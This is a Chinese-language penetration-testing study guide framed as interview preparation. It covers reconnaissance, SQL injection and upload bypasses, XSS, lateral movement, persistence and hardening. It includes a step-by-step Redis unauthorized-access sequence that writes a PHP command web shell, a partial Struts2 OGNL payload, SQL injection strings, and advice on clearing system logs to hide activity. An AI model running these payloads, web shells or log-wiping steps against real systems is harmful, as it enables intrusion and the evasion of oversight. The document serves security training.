渗透测试面试问题合集
字数 1670 2025-08-15 21:31:37
渗透测试全面指南
一、渗透测试流程概述
1. 信息收集阶段
-
服务器信息收集:
- 真实IP、系统类型、版本、开放端口、WAF识别
- 方法:Nmap扫描、WAF指纹识别、CDN检测
-
网站指纹识别:
- CMS识别(如WordPress、DedeCMS)
- 证书信息分析、DNS记录查询
- 工具:WhatWeb、Wappalyzer
-
WHOIS信息:
- 注册者姓名、备案信息、邮箱、电话
- 反查技巧:社工库查询、关联信息挖掘
-
子域名与旁站:
- 子域名枚举(subdomain、Sublist3r)
- C段扫描、旁站检测
- Google Hacking技巧(site:、filetype:pdf等)
2. 漏洞挖掘阶段
-
常见漏洞类型:
- Web漏洞:XSS、SQL注入、文件上传、命令注入
- 服务漏洞:弱口令、未授权访问、配置错误
- 中间件漏洞:IIS解析漏洞、Nginx目录穿越
-
自动化工具:
- SQLMap、Burp Suite、Metasploit
- 漏扫工具:Nessus、OpenVAS
3. 漏洞利用与提权
-
Windows提权:
- 服务提权(MySQL、Serv-U)
- 内核漏洞利用(如MS08-067)
-
Linux提权:
- 脏牛漏洞(Dirty Cow)
- sudo配置错误、SUID滥用
4. 后渗透与报告
-
日志清理:
- /var/log/清理(auth.log、secure等)
- Windows事件日志清除
-
报告编写:
- 漏洞详情、风险等级、修复建议
- 复测流程与验证方法
二、核心技术详解
1. SQL注入深度解析
-
注入类型:
UNION SELECT 1,2,3-- AND 1=CONVERT(int, @@version) -
绕过技巧:
- 编码绕过(Hex、Base64)
- 注释符混淆(/**/、--%0a)
- 等价函数替换
-
防御方案:
- 预编译语句
- 输入过滤与白名单
- 最小权限原则
2. 文件上传漏洞
-
常见绕过方式:
- 双扩展名(.php.jpg)
- 大小写变异(PhP)
- 内容检测绕过(GIF头)
-
防护措施:
- MIME类型校验
- 文件内容检测
- 随机重命名
3. XSS攻击体系
-
三种类型对比:
类型 存储位置 持久性 反射型 URL参数 非持久 存储型 数据库 持久 DOM型 前端代码 视情况 -
高级利用:
- Cookie窃取
- 键盘记录
- BeEF框架集成
4. CSRF防御机制
- Token实现:
<input type="hidden" name="csrf_token" value="随机字符串"> - SameSite Cookie属性
- 验证Referer头
三、内网渗透技术
1. 横向移动手法
-
协议利用:
- SMB爆破(永恒之蓝)
- RDP劫持
- WMI远程执行
-
凭证获取:
- Mimikatz抓取
- SAM数据库提取
- 票据传递攻击
2. 权限维持
-
后门技术:
- WebShell隐藏(.htaccess)
- 服务注册
- 计划任务
-
隐蔽通道:
- DNS隧道
- ICMP隐蔽通信
- HTTP头部伪装
四、漏洞利用实例
1. Redis未授权访问
# 关键步骤:
1. redis-cli -h 目标IP
2. config set dir /var/www/html
3. config set dbfilename shell.php
4. set x "<?php system($_GET['cmd']);?>"
5. save
2. Struts2漏洞利用
POST /struts2-showcase/ HTTP/1.1
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)...}
五、防御体系建设
1. 安全配置清单
-
服务器加固:
- 关闭不必要服务
- 定期更新补丁
- 防火墙规则优化
-
应用层防护:
- WAF规则配置
- RASP技术部署
- 输入输出过滤
2. 监控与响应
-
日志分析:
- ELK Stack部署
- 异常行为检测
-
应急响应:
- 事件分类分级
- 取证流程
- 恢复方案
六、附录:工具速查表
| 工具名称 | 用途 | 示例命令 |
|---|---|---|
| Nmap | 端口扫描 | nmap -sV -O 目标IP |
| SQLMap | SQL注入 | sqlmap -u "url" --risk=3 |
| Metasploit | 漏洞利用 | use exploit/multi/handler |
| Burp Suite | Web代理 | 拦截修改HTTP请求 |
| Cobalt Strike | 远控平台 | 生成Beacon |
本指南持续更新,建议结合实战环境进行验证测试。所有技术仅限合法授权使用,请遵守网络安全法律法规。